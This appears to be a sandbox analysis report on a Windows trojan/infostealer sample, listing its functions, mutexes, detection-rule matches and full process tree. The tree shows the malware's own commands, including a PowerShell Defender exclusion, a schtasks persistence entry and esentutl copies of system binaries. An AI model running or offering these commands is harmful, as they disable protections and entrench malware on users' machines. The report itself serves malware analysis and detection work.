Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Code function: 22_2_02DB86F7 NtUnmapViewOfSection,	22_2_02DB86F7
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Code function: 22_2_02DB7AC9 NtAllocateVirtualMemory,	22_2_02DB7AC9
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Code function: 22_2_02DB7A2A NtAllocateVirtualMemory,	22_2_02DB7A2A
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Code function: 22_2_02DB8D6E Wow64GetThreadContext,Wow64SetThreadContext,NtResumeThread,	22_2_02DB8D6E

Source: C:\Users\user\Desktop\2jbMIxCFsK.exe

Code function: 0_2_02E7F7C8 InetIsOffline,CoInitialize,CoUninitialize,CreateProcessAsUserW,ResumeThread,CloseHandle,CloseHandle,ExitProcess,

0_2_02E7F7C8

Source: C:\Users\user\Desktop\2jbMIxCFsK.exe	Code function: 0_2_02E620C4	0_2_02E620C4
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 9_2_009E41C8	9_2_009E41C8
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 9_2_009E4A98	9_2_009E4A98
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 9_2_009EEA80	9_2_009EEA80
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 9_2_009EAA43	9_2_009EAA43
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 9_2_009E3E80	9_2_009E3E80
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 9_2_009EDF00	9_2_009EDF00
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 9_2_009EDF00	9_2_009EDF00
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 9_2_062756B8	9_2_062756B8
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 9_2_062766E8	9_2_062766E8
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 9_2_0627C2A0	9_2_0627C2A0
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 9_2_0627B32A	9_2_0627B32A
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 9_2_06273178	9_2_06273178
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 9_2_06277E78	9_2_06277E78
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 9_2_06277798	9_2_06277798
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 9_2_0627E4C0	9_2_0627E4C0
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 9_2_06272350	9_2_06272350
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 9_2_06270040	9_2_06270040
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 9_2_06275DDF	9_2_06275DDF
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 9_2_06270025	9_2_06270025
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Code function: 10_2_028B85B7	10_2_028B85B7
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Code function: 10_2_028B85C8	10_2_028B85C8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_0306B490	11_2_0306B490
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_0306B470	11_2_0306B470
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_08973E98	11_2_08973E98
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Code function: 15_2_065BDAAC	15_2_065BDAAC
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Code function: 15_2_065B1B94	15_2_065B1B94
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Code function: 15_2_065BE608	15_2_065BE608
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Code function: 15_2_065B25B8	15_2_065B25B8
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Code function: 15_2_065B25A8	15_2_065B25A8
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Code function: 15_2_065B4172	15_2_065B4172
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Code function: 15_2_065B1D20	15_2_065B1D20
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Code function: 15_2_06633360	15_2_06633360
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Code function: 22_2_02DA20C4	22_2_02DA20C4
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Code function: 22_2_02DAC977	22_2_02DAC977
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 24_2_00C941C8	24_2_00C941C8
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 24_2_00C9A988	24_2_00C9A988
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 24_2_00C9EA80	24_2_00C9EA80
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 24_2_00C94A98	24_2_00C94A98
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 24_2_00C93E80	24_2_00C93E80
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 24_2_00C9DE38	24_2_00C9DE38
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 24_2_00C9DE38	24_2_00C9DE38
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 24_2_064047CC	24_2_064047CC
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 24_2_06401B48	24_2_06401B48
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 24_2_064067F1	24_2_064067F1
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 24_2_06401F00	24_2_06401F00
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 24_2_06405A41	24_2_06405A41
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 24_2_06405AC0	24_2_06405AC0
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 24_2_06405B08	24_2_06405B08
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 24_2_06417E78	24_2_06417E78
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 24_2_064166E8	24_2_064166E8
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 24_2_064156B8	24_2_064156B8
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 24_2_0641C2A0	24_2_0641C2A0
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 24_2_06412360	24_2_06412360
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 24_2_0641B338	24_2_0641B338
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 24_2_06417798	24_2_06417798
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 24_2_0641E4C0	24_2_0641E4C0
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 24_2_06415DF0	24_2_06415DF0
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 24_2_06410040	24_2_06410040
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 24_2_06410025	24_2_06410025

Source: Joe Sandbox View	Dropped File: C:\Users\Public\Libraries\Wisrysxl.PIF 054899796D592BB5F70B0A9FA28429024A919270A76603626BE24068FAAE59D9
Source: Joe Sandbox View	Dropped File: C:\Users\Public\Libraries\lxsyrsiW.pif 7BCDC2E607ABC65EF93AFD009C3048970D9E8D1C2A18FC571562396B13EBB301

Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Code function: String function: 02DA46D4 appears 155 times
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Code function: String function: 02DA4860 appears 683 times
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Code function: String function: 02DB894C appears 50 times
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe	Code function: String function: 02E64500 appears 33 times
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe	Code function: String function: 02E64860 appears 949 times
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe	Code function: String function: 02E789D0 appears 45 times
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe	Code function: String function: 02E7894C appears 56 times
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe	Code function: String function: 02E644DC appears 74 times
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe	Code function: String function: 02E646D4 appears 244 times

Source: 2jbMIxCFsK.exe	Binary or memory string: OriginalFilename vs 2jbMIxCFsK.exe
Source: 2jbMIxCFsK.exe, 00000000.00000002.2224009200.000000002229C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameLOADER.EXEB vs 2jbMIxCFsK.exe
Source: 2jbMIxCFsK.exe, 00000000.00000002.2202959804.0000000020D44000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameeasinvoker.exej% vs 2jbMIxCFsK.exe
Source: 2jbMIxCFsK.exe, 00000000.00000002.2202959804.0000000020D44000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameLOADER.EXEB vs 2jbMIxCFsK.exe
Source: 2jbMIxCFsK.exe, 00000000.00000002.2175050035.0000000002E8E000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameeasinvoker.exej% vs 2jbMIxCFsK.exe
Source: 2jbMIxCFsK.exe, 00000000.00000002.2175050035.0000000002E8E000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameLOADER.EXEB vs 2jbMIxCFsK.exe
Source: 2jbMIxCFsK.exe, 00000000.00000003.2050268749.0000000002CCD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameLOADER.EXEB vs 2jbMIxCFsK.exe
Source: 2jbMIxCFsK.exe, 00000000.00000002.2173838479.0000000002CC9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameLOADER.EXEB vs 2jbMIxCFsK.exe
Source: 2jbMIxCFsK.exe, 00000000.00000003.2122962525.000000007ED80000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameeasinvoker.exej% vs 2jbMIxCFsK.exe
Source: 2jbMIxCFsK.exe, 00000000.00000003.2122962525.000000007ED80000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTruesight4 vs 2jbMIxCFsK.exe
Source: 2jbMIxCFsK.exe, 00000000.00000002.2202959804.0000000020D99000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameeasinvoker.exej% vs 2jbMIxCFsK.exe
Source: 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF00000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameeasinvoker.exej% vs 2jbMIxCFsK.exe
Source: 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF00000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTruesight4 vs 2jbMIxCFsK.exe
Source: 2jbMIxCFsK.exe, 00000000.00000002.2229949049.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameeasinvoker.exej% vs 2jbMIxCFsK.exe
Source: 2jbMIxCFsK.exe, 00000000.00000002.2229949049.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTruesight4 vs 2jbMIxCFsK.exe
Source: 2jbMIxCFsK.exe, 00000000.00000002.2237079375.000000007FAAF000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameLOADER.EXEB vs 2jbMIxCFsK.exe
Source: 2jbMIxCFsK.exe, 00000000.00000003.2050057116.000000007FC50000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameeasinvoker.exej% vs 2jbMIxCFsK.exe
Source: 2jbMIxCFsK.exe, 00000000.00000003.2143795019.0000000022293000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameeasinvoker.exej% vs 2jbMIxCFsK.exe
Source: 2jbMIxCFsK.exe, 00000000.00000002.2202959804.0000000020CC3000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameLOADER.EXEB vs 2jbMIxCFsK.exe
Source: 2jbMIxCFsK.exe, 00000000.00000002.2202959804.0000000020CC3000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameeasinvoker.exej% vs 2jbMIxCFsK.exe
Source: 2jbMIxCFsK.exe, 00000000.00000003.2143795019.0000000022264000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameeasinvoker.exej% vs 2jbMIxCFsK.exe
Source: 2jbMIxCFsK.exe, 00000000.00000002.2225406008.00000000225FF000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameLOADER.EXEB vs 2jbMIxCFsK.exe
Source: 2jbMIxCFsK.exe, 00000000.00000002.2173838479.0000000002CC5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameeasinvoker.exej% vs 2jbMIxCFsK.exe
Source: 2jbMIxCFsK.exe, 00000000.00000003.2050268749.0000000002CC9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameeasinvoker.exej% vs 2jbMIxCFsK.exe
Source: 2jbMIxCFsK.exe, 00000000.00000003.2050539495.000000007F920000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameeasinvoker.exej% vs 2jbMIxCFsK.exe
Source: 2jbMIxCFsK.exe, 00000000.00000003.2050539495.000000007F920000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameLOADER.EXEB vs 2jbMIxCFsK.exe
Source: 2jbMIxCFsK.exe, 00000000.00000002.2166786184.0000000002275000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameeasinvoker.exej% vs 2jbMIxCFsK.exe
Source: 2jbMIxCFsK.exe, 00000000.00000002.2224009200.000000002223D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameLOADER.EXEB vs 2jbMIxCFsK.exe
Source: 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF87000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameeasinvoker.exej% vs 2jbMIxCFsK.exe
Source: 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF87000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTruesight4 vs 2jbMIxCFsK.exe

Source: 2jbMIxCFsK.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI

Source: 9.0.neworigin.exe.240000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe, type: DROPPED	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers

Source: armsvc.exe.8.dr

Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Source: armsvc.exe.8.dr

Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Source: classification engine

Classification label: mal100.spre.troj.spyw.evad.winEXE@49/26@4/3

Source: C:\Users\user\Desktop\2jbMIxCFsK.exe

Code function: 0_2_02E67FD4 GetDiskFreeSpaceA,

0_2_02E67FD4

Source: C:\Users\user\Desktop\2jbMIxCFsK.exe

Code function: 0_2_02E76DC8 CoCreateInstance,

0_2_02E76DC8

Source: C:\Users\user\Desktop\2jbMIxCFsK.exe

File created: C:\Users\Public\Libraries\PNO

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3440:120:WilError_03
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Mutant created: NULL
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Mutant created: \Sessions\1\BaseNamedObjects\kbedaSzAAOYDRDgN
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Mutant created: \Sessions\1\BaseNamedObjects\Global\Multiarch.m0yv-7270c52c6967b89b-inf
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1776:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2884:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1248:120:WilError_03
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Mutant created: \Sessions\1\BaseNamedObjects\Global\Multiarch.m0yv-7270c52c6967b89b73779169-b
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6660:120:WilError_03

Source: C:\Users\Public\Libraries\lxsyrsiW.pif

File created: C:\Users\user\AppData\Local\Temp\neworigin.exe

Jump to behavior

Source: C:\Users\user\Desktop\2jbMIxCFsK.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales

Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\Public\Libraries\lxsyrsiW.pif

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\2jbMIxCFsK.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: 2jbMIxCFsK.exe

ReversingLabs: Detection: 57%

Source: C:\Users\user\Desktop\2jbMIxCFsK.exe

File read: C:\Users\user\Desktop\2jbMIxCFsK.exe

Jump to behavior

Source: C:\Users\Public\Libraries\lxsyrsiW.pif

Evasive API call chain: __getmainargs,DecisionNodes,exit

graph_8-188

Source: unknown	Process created: C:\Users\user\Desktop\2jbMIxCFsK.exe "C:\Users\user\Desktop\2jbMIxCFsK.exe"
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\lxsyrsiW.cmd" "
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\ping.exe /d C:\\Users\\Public\\xpha.pif /o
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe	Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl.exe /y C:\Users\user\Desktop\2jbMIxCFsK.exe /d C:\\Users\\Public\\Libraries\\Wisrysxl.PIF /o
Source: C:\Windows\SysWOW64\esentutl.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe	Process created: C:\Users\Public\Libraries\lxsyrsiW.pif C:\Users\Public\Libraries\lxsyrsiW.pif
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Process created: C:\Users\user\AppData\Local\Temp\neworigin.exe "C:\Users\user\AppData\Local\Temp\neworigin.exe"
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Process created: C:\Users\user\AppData\Local\Temp\server_BTC.exe "C:\Users\user\AppData\Local\Temp\server_BTC.exe"
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 02:18 /du 23:59 /sc daily /ri 1 /f
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process created: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe"
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpBC1D.tmp.cmd""
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout 6
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: unknown	Process created: C:\Users\Public\Libraries\Wisrysxl.PIF "C:\Users\Public\Libraries\Wisrysxl.PIF"
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Process created: C:\Users\Public\Libraries\lxsyrsiW.pif C:\Users\Public\Libraries\lxsyrsiW.pif
Source: C:\Windows\SysWOW64\timeout.exe	Process created: C:\Users\user\AppData\Local\Temp\neworigin.exe "C:\Users\user\AppData\Local\Temp\neworigin.exe"
Source: C:\Windows\SysWOW64\timeout.exe	Process created: C:\Users\user\AppData\Local\Temp\server_BTC.exe "C:\Users\user\AppData\Local\Temp\server_BTC.exe"
Source: unknown	Process created: C:\Users\Public\Libraries\Wisrysxl.PIF "C:\Users\Public\Libraries\Wisrysxl.PIF"
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Process created: C:\Users\Public\Libraries\lxsyrsiW.pif C:\Users\Public\Libraries\lxsyrsiW.pif
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Local\Temp\neworigin.exe "C:\Users\user\AppData\Local\Temp\neworigin.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Local\Temp\server_BTC.exe "C:\Users\user\AppData\Local\Temp\server_BTC.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe"
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\lxsyrsiW.cmd" "	Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe	Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl.exe /y C:\Users\user\Desktop\2jbMIxCFsK.exe /d C:\\Users\\Public\\Libraries\\Wisrysxl.PIF /o	Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe	Process created: C:\Users\Public\Libraries\lxsyrsiW.pif C:\Users\Public\Libraries\lxsyrsiW.pif	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\ping.exe /d C:\\Users\\Public\\xpha.pif /o	Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Process created: C:\Users\user\AppData\Local\Temp\neworigin.exe "C:\Users\user\AppData\Local\Temp\neworigin.exe"	Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Process created: C:\Users\user\AppData\Local\Temp\server_BTC.exe "C:\Users\user\AppData\Local\Temp\server_BTC.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 02:18 /du 23:59 /sc daily /ri 1 /f	Jump to behavior
